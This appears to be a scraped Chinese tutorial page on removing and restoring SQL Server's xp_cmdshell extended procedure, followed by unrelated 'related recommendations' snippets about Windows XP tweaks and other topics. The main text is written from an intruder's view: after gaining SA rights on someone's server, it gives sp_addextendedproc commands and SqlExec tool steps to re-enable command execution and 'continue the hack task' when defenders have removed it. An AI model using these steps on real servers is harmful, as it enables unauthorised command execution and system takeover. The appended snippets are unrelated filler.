1.去掉xp_cmdshell扩展过程的方法是使用如下语句:
以下是代码:
if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
2.添加xp_cmdshell扩展过程的方法是使用如下语句:
以下是代码:
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
现在看看现象:
我们在取得SA权限后远程用Sqlexec执行cmd命令,出现提示SQL_ERROR,那么很可能是去掉了xp_cmdshell。
现在来看看被去掉xp_cmdshell后恢复的两种方法:
方法一、使用SQL Query Analyzer连接对方后直接写入,挺方便
以下是代码:
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
方法二、使用SqlExec Sunx Version
首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入
以下是代码:
sp_addextendedproc 'xp_cmdshell','xpsql70.dll'
或者对Sql2000情况下使用
以下是代码:
sp_addextendedproc 'xp_cmdshell','xplog70.dll'
另外使用SqlExec Sunx Version来去除xp_cmdshell的方法
和加的时候选择条件一样,然后输入
以下是代码:
sp_dropextendedproc 'xp_cmdshell'
就可以了
第二部分:
假如对方已经把xplog70.dll删除或者改了名,我们来用下面的方法继续我们的hack任务:
当出现如下现象暗示代表很有可能是xplog70.dll删除或者改了名。
在查询分析器中写入
以下是代码:
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
提示
数据库中已存在名为'xp_cmdshell'的对象
分享到:
相关推荐
XP_CMDSHELL存储过程是执行本机的CMD命令,要求系统登陆有SA权限,也就是说如果获得SQLSERVER的SA命令,那就可以在目标机为所欲为了,知名软件“流光”使用的应该也是这个存储过程来实现在目标机上的操作。
1. 安全性:由于XP系统已经不再接受官方的安全更新,因此使用该系统意味着需要采取额外的措施来保护自己免受病毒和恶意软件的侵害,比如安装可靠的第三方安全软件,并保持其更新。 2. 兼容性:随着时间的推移,一些...
去除XP系统桌面图标小箭头,适用于XP系统
电力系统的安全性是现代经济社会发展的重要基石,因为它直接影响到经济稳定和社会生活的正常运行。电力系统安全性主要涉及电力系统在遭遇各种内外部干扰时的稳定性和恢复能力。本文将深入探讨电力系统安全性的概念、...
SQL Server SA权限总结经典技术 ...去掉xp_cmdshell可以保护系统的安全,而恢复xp_cmdshell需要使用恰当的方法来避免安全隐患。本文对SQL Server SA权限总结经典技术进行了详细的总结和分析,并提供了相关的解决方案。
xp系统的桌面图标快捷方式一般来说会有小箭头,该命令可去除xp系统桌面图标快捷方式小箭头
XP系统精简工具(优化魔鬼)1.41正是这样一个专业的工具,它能够智能识别并去除XP系统中不常用的组件和服务,为用户释放出更多的磁盘空间,同时提升系统的响应速度。 接下来,我们要讨论的是"系统优化"。系统优化涵盖...
XP系统优化小软件是针对微软Windows XP操作系统设计的一系列便捷工具,主要目的是提高系统的性能、稳定性和安全性。这些工具通常包括一键式优化脚本和命令行工具,它们可以帮助用户快速调整系统设置,去除不必要的...
标题中的“如何去掉XP下的“Windows安全警报””指的是在Windows XP操作系统中,用户希望消除系统频繁显示的“Windows安全警报”提示,这个警报通常与系统安全相关,尤其是涉及防火墙、自动更新和病毒防护等设置。...
通信协议是网络通信的基础,不同的协议具有不同的安全性和稳定性。因此,选择合适的通信协议对于保证系统的安全稳定运行非常重要。 4.设备其他安全要求 设备安全包括硬件设备和软件设备的安全。硬件设备如服务器、...
首先,Allatori-7.4的核心功能是进行代码混淆,它通过重命名类、方法和变量,打乱控制流程,甚至删除无用代码来增强程序的安全性。在新版本中,一个显著的变化是去除了main方法并增加了打印信息。main方法是Java程序...
3. **保持更新**:由于XP系统已不再得到微软的官方支持,因此,使用精简工具时,需要考虑系统安全性和兼容性问题。定期检查更新和安全补丁,或者安装第三方防护软件。 **四、总结** "MSTool"作为一款深度XP精简...
这个过程虽然确保了系统的安全性,但对于个人家庭用户而言,如果计算机不存储敏感信息或不需要高度安全防护,登录界面的存在可能会带来不便,例如增加开机时间等。 ### 知识点二:去除Windows XP登录画面的方法 要...
数据库实验安全性数据库实验安全性 本实验报告的目的是熟悉通过 SQL 对数据进行安全性控制,包括授权和权力回收。实验内容 涉及到授予用户不同的权限,例如查询、插入、更新、删除等,并且学习如何回收这些权限。 ...
在Windows XP系统中,快捷方式是用户快速启动程序或访问文件的一种便利方式。然而,有时候为了整理系统,或者为了减少桌面和文件夹的混乱,我们可能会想要批量删除这些快捷方式。批处理(Batch Processing)是一种在...
然而,需要注意的是,随着技术的发展,WindowsXP已逐渐退出历史舞台,现代操作系统提供了更为先进的功能和更高的安全性。因此,尽管本方法在特定场景下仍具价值,但对于追求最新技术和安全性的项目,应考虑采用更新...
5. **更新补丁安装**:Windows XP的安全性随着微软停止支持而下降,批处理文件可能包含了安装重要安全更新的命令,以弥补官方更新的缺失。 6. **性能设置调整**:通过修改系统设置,如调整视觉效果、设置虚拟内存等...
【钢铁制氧站生产系统安全性分析】 随着科技的飞速发展,氧气的需求量日益增加,制氧企业也随之扩大生产规模。然而,氧气自身的化学性质决定了其在生产与储存过程中存在燃烧和爆炸的风险。钢铁制氧站作为这类企业的...
自由天空XP系统快速配置工具可以帮助用户管理启动项,去除无用的程序,保证系统快速启动。 4. **安全设置**:工具会进行必要的安全设置,如禁用某些可能导致安全问题的组件,设置系统防火墙规则,确保封装后的系统...
在Windows XP操作系统中,快捷方式通常会有一个小箭头图标来指示它是一个指向其他程序或文件的快捷方式,而不是实际的文件。对于某些用户来说,这个小箭头可能显得不美观或者想要统一桌面的视觉效果,因此他们会选择...